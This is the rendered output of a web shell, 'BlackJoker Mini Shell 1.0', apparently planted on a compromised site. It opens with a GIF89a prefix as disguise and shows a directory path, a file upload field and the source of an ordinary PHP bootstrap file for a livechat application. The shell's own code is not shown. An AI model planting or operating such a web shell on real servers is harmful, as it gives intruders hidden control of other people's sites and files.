GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/livechat/php/
Upload File :
Current File : /home/serb/public_html/livechat/php/app.php

<?php

ob_start();

// -----

// Error displaying (comment the following to turn on error displaying)

error_reporting(0);

// Constants

define('ROOT_DIR', dirname(__FILE__));

// Imports

require_once 'lib/magic_quotes_fix.php';
require_once 'lib/autoload.php';

// Run the application

$application = new Application();
$application->config();

$response = $application->run(new Request());
$response->send();

// -----

ob_end_flush();

?>

./BlackJoker Mini Shell 1.0